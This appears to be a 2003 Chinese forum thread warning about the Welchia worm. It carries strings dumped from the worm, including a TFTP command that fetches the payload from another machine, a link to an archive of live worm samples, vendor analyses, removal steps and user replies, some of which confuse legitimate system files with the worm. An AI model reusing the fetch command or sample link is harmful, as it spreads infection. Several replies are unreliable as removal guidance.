[公告]：又有新型病毒！！！

yy225cn

转帖：

如果大家在自己 的system32 目录里的 [B]WINS[/B] 目录里发现[B]DLLHOST.EXE[/B] 和[B]SVCHOST.EXE[/B]那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒


DLLHOST.EXE里面有这样的话!

<textarea name="textfield" cols="80" rows="12">=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE </textarea>


说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在 [B]*:\WINDOWS\SYSTEM32\WINS\[/B]里
如果是NT系统..比如2000.那么就应该是在 [B]*:\winnt\system32\wins\[/B]里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar

传染是利用TFTP上传的，，如果大家用不上这东东。完全可以删除TFTP.EXE


[B]正常的SVCHOST.EXE是在SYSTEM32目录里[/B]

如果你的防护墙被PING..那么你那里有一定有机器中了!!

这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING。




[B]交大铭泰发现以毒攻毒的“冲击波杀手”[/B]

　　8月18日夜，交大铭泰率先在国内截杀了一种可以杀“冲击波”病毒的新型蠕虫病毒。交大铭泰提醒广大电脑用户升级病毒库。同时，如果没有采用东方卫士主动防御体系的电脑用户下载交大铭泰提供的免费数字疫苗，可以防范冲击波及其变种的攻击，并可以抵御新的蠕虫病毒的入侵。

　　此“冲击波杀手”病毒会自动清除“冲击波”Blaster病毒。会自动修补系统漏洞。居然支持英文、简体中文、繁体中文、韩文四种系统。会自动卸载, 2004年以后，自动删除自己。感染后会开一个ftp服务器。这个病毒是“善意”的，而且编写质量极高。

　　交大铭泰东方卫士率先升级病毒库，8月18日晚，交大铭泰已经升级病毒可对此病毒进行查杀，此病毒疑是专业反病毒人士所为。

　　病毒分析报道：

　　病毒名称：Win32/Welchia.worm. 10240

　　别名：WORM_MSBLAST.D

　　发现日期：2003-8-18

　　病毒类型：蠕虫

　　感染长度：10,240 bytes

　　危害级别：中

　　传播速度：快

　　受影响系统：Windows 2000, Windows XP,

　　不受影响系统：Macintosh, OS/2, Unix, Linux Win98

　　传播:通过微软RPC漏洞.

　　漏洞介绍:http://www.microsoft.com/technet ... lletin/MS03-026.asp

　　破坏:致使网路堵塞,机器崩溃.

　　病毒基本概述:

　　Win32/Welchia.worm.10240是利用RPC DCOM漏洞传播的蠕虫，交大铭泰公司从2003年8月18日下午开始接收了大量举报。

　　该蠕虫利用RPC DCOM漏洞传播，运行这后下载有关RPC DCOM的安全补丁。并且若存在Blaster的Win32/Blaster.worm.6176蠕虫，则强行结束后删除文件。-打开TCP 707端口。

　　病毒技术特征：

　　被蠕虫感染的系统向download.microsoft.com请求DNS query之后，得到相关IP地址，访问网站，下载适合被感染计算机操作系统的补丁文件。

　　下载文件之后，传送ICMP包(类型为8号的Echo Request)，查找还好的系统。传送ICMP包时，基于计算机中设置的IP地址，固定B类地址之后，增加C类域的IP地址发送包。(如具有192.168.40.10的IP地址，则被蠕虫感染之后发送ICMP包时，从192.168.0.1开始继续增加地址。)

　　向ICMP发送包之后还有未感染的系统，则利用TCP/135号的RPC DCOM漏洞，试图攻击。攻击成功，则比Win32/Blaster.worm不同，利用TCP/707号以逆方向弹出命令运行窗口。

　　即, Blaster蠕虫向受攻击的系统以TCP/4444打开端口下载并运行蠕虫，但该蠕虫是对试图攻击的计算机以TCP/707号打开端口。打开707端口之后，运行如下命令。

　　传播时网络流量

　　虽然向一个C类域发送包每个系统需要的时间稍不同，但需要约4秒的时间。ICMP包是106Bytes，包含64 bytes的任意数据。该蠕虫生成ICMP包时，可引发每秒大约6.5K,每分钟388K左右的流量。

　　运行后的症状

　　该蠕虫利用Windows系统文件夹(通常\Winnt\system32, \windows\system32)的子文件夹Wins文件夹下安装如下文件。

　　- dllhost.exe (10,240字节)

　　是可执行压缩形式的蠕虫本身，由Visual C++编写的。卫士诊断为Win32/Welchia.worm.10240。

　　- svchost.exe (19,728字节)

　　原来是tftpd.exe文件，正常的文件，因此不诊断。

　　并且添加注册表值之后登录成服务，使每次启动时运行。

　　解决方案：

　　东方卫士系列产品20030819版本以后均可查杀

　　手动治疗方法

　　1.双击开始-> 设置-> 控制面板-> 管理工具-> 服务图标。

　　2.确认运行中的服务中是否有如下服务，若有停止该服务。

　　- WINS Client

　　3.同时按CTRL+ALT+DEL键，运行任务管理器之后-> 转到进程。

　　4.确认运行中的进程目录中是否有DLLHOST.EXE，若有选择'结束进程'按钮结束进程。

　　- -利用Blaster蠕虫专用工具的拦截，诊断/删除包的方法

　　利用Blaster专用工具，则可拦截Win32/Welchia.worm.1024，并可诊断/删除Win32/Welchia.worm.10240文件


[B]最新病毒警告！！！[/B]


　　 昨天（8月18日）16：00左右，网络上出现一种新型的蠕虫变种病毒，W32.Welchia.Worm

详细信息请查看以下网页：
http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.worm.html

该病毒感染没打RPC补丁的WIN2000、WIN2003、WINXP、WINNT等微软服务器NT系统，感染后的计算机会不断用ICMP包去ping网络上的其他计算机，造成网络拥塞，严重的会使计算机或整个局域网瘫痪，请有关网络使用者注意！

由于该病毒出现的时间短，到现时为止只有个别的国外杀毒软件能查杀，请所有互联网用户检查自己的计算机系统，发现有病毒的用户可以通过手工清除该病毒。具体方法如下：

一、查找该病毒，病毒文件位置：
c:\winnt\system32\wins\DLLHOST.exe
c:\winnt\system32\wins\SVCHOST.exe

二、删除方法：
1） 脱离网络
2） 在“开始——》运行”内输入regedit.exe，回车后可以打开注册表，

打开注册表中的
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
删除这三项里面的RPCPATH子键和 RPCTFTFDD子键后重起计算机

3）计算机重起后用资源管理器删除 c:\WINNT\SYSTEM32\WINS\ 内的EXE文件
c:\winnt\system32\wins\DLLHOST.exe
c:\winnt\system32\wins\SVCHOST.exe
要按SHIFT 才能删除!!

4） 打上微软的RPC补丁。

补丁连接
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-026.asp

yi.gao

能详细介绍一下吗？我的机器发现上述文件了。有什么危害？

hs_f

我的也有这二个文件呀，不过没有wins目录，在system32下。

yi.gao

最初由 hs_f 发布
[B]我的也有这二个文件呀，不过没有wins目录，在system32下。 [/B]

我的与你一样，想必那是xp下的。我的是2000，前段时间装了sp3，删除DLLHOST.EXE 以后提示sp3需从装，后一个无法删除。

yy225cn

最初由 hs_f 发布
[B]我的也有这二个文件呀，不过没有wins目录，在system32下。 [/B]

在 system32 文件夹下面是正常的，但是如果在 wins 目录下面也有的话，就要格外注意了。

最近互联网不太安宁，大家上网还是要多注意为好，宁可信其有，不可信其无。

lt_zzy

我的system32下面那两个文件都有，但是第二个文件，说什么系统正在使用，删除不了。

yi.gao

我糊涂了，到底是不是病毒？

msdg

最近机器异常，加了补丁后，大部分应用程序已基本恢复正常，但WORD和ACAD2002仍有问题存在（基本不影响使用，只是操作麻烦了些），说明系统仍存在问题，用几种专杀软件查杀后均说未发现病毒，但问题确实存在，看了此帖，觉得有应该是解决比问题的方法了。现将所查结果附上，请YY帮助诊断和明示解决此问题的操作步骤。谢谢！

Archs

dllhost.exe在windows下删除不了，只能在dos下删除

msdg

我的操作系统是WIN2000，未打补丁前，基本用不了，这两天工作正紧，电脑出不得半点差错！

msdg

最初由 Archs 发布
[B]
dllhost.exe在windows下删除不了，只能在dos下删除 [/B]

换个操作系统，比如WIN98，可以吗？

lt_zzy

这几个文件删除了，过一会儿再去找的时候却又产生了。

alim

在SYSTEM32下的文件是微软的东东，应该不是病毒。

willgarden

确实是这样的,我们这里有很多机器都PING别人

菜丁

难道我又中招了？瑞星最新版13.49没有发现？